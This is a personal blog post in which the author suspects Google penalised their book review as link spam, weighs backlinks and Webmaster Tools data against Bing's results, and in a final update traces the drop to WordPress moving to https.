Spammers build networks of shady backlinks to promote their stuff. So common knowledge is of course that you should not buy links or create such network scams. Ironically, I have cross-linked all my own sites like hell for many years. Not for SEO purposes but in my eternal quest for organizing my stuff, keeping things separate, but adding the right pointers though, Raking the virtual Zen Garden etc. Never ever did this backfire. I was always concerned about the effect of my links and resources pages (links to other pages, mainly tech and science). Today my site radices.net which was once an early German predecessor of this blog is my big link dump – but still these massive link collections are not voted down by Google.

Maybe Google considers my posting and the physics book author’s website part of such a link scam. I have linked to the author’s page several times – to sample chapters, generously made available via download as PDFs, and the author linked back to me. I had refused to tie my blog to my Google+ account and claim ‘Google authorship’ so far as I don’t wanted to trade elkement for my real name on G+. Via Webmaster tools Google knows about all my domains but they might suspect I – a pseudo-anonymous elkement, using an @subversiv.at address on G+ – might also own the book author’s domain that I – diabolically smart – did not declare in Webmaster Tools.

As I said before, from a most objective perspective Google’s rationale might not be that unreasonable. I don’t write book reviews that often, my most recent were about The Year Without Pants and The Glass Cage. I rather write posts triggered by one idea in a book, maybe not even the main one. When I write about books I don’t use Amazon Affiliate marketing – as professional reviewers such as Brain Pickings or Farnam Street do. I write about unrelated topics. I might not match the expected pattern. This is amusing as long as only a blog is concerned but on principle it is similar as being interviewed by the FBI at an airport because your travel pattern just can’t be normal (as detailed in the book Bursts, on modelling human behaviour – a book I also sort of reviewed last year).

In short, I sometimes review and ‘promote’ books without any return on that. I simply don’t review books I don’t like as I think blogging should be fun. Maybe in an age of gamified reviews and fake forum posts with spammy signatures Google simply doesn’t buy into that. I sympathize. I learned that forums websites shod add a nofollow tag to any hyperlinks users post so that Google will now downvote the link targets. So links in discussion groups are considered spammy per se and you need to do something about it so that they don’t hurt what you – as a forum user – are probably trying to discuss or recommend in good faith. I already live in fear that those links some tinkerers set in DIYer’s forums (linking to our business site or my posts on our heating system) will be considered paid link spam.

However, I cannot explain why I can find my book review post on Google (thus generating an impression) when searching for site:[URL of the post]. Perhaps consolidation takes time. Perhaps there is hope. I even see the post when I use Tor Browser and a foreign IP address so this is not related to my preferences as a logged on Google user. But if there isn’t a glitch in Webmaster Tools, no other typical searcher encounters this impression. I am aware of the tool for disavowing URLs but I don’t want to report a perfectly valid backlink. In addition, that backlink from the author’s site does not even show up in the list of external backlinks which is another enigma.

I know that this seems to be an obsession with a first world problem: This was an post on a topic I don’t claim expertise or that I don’t consider strategically important. But whatever happens to this blog could happen to other sites I am more concerned about, business-wise. So I hope if is just a bug and/or Google Bots will read this post and will release my link. Just in case I mentioned your book or blog here, even if indirectly, please don’t backlink.

Perhaps Google did not like my ranting about encrypted search terms, not available to the search term poet. I dared to display the Bing logo back then. Which I will do again now as:

  • Bing tells me that the infamous post generates impressions and clicks
  • Bing recognizes the backlink
  • The number of indexed pages is increasing gradually with time.
  • And Bing did not index the spammy pages in the brief period they were on our hacked website.

Bing logo (2013)Update 2014-12-23 – it actually happened twice:

Analyzing the impressions from the last day I realize that Google has also treated my physics resources page Physics Books on the Bedside Table this way. Page impressions dropped and now that page which was the top one (after the review had plummeted) is gone, too. I had already considered to move this page to my site that hosts all those list of links (without issues, so far): radices.net, and I will complete this migration in a minute. Now of course Google might think I, the link spammer, am frantically moving on to another site.

Update 2014-12-24 – now at least results are consistent:

I cannot see my own review post anymore when I search for the title of the book. So finally the results from Webmaster Tools are in line with my tests.

Update 2015-01-23 – totally embarrassing final statement on this:

WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version which has to be added in Google Webmaster Tools as a separate website.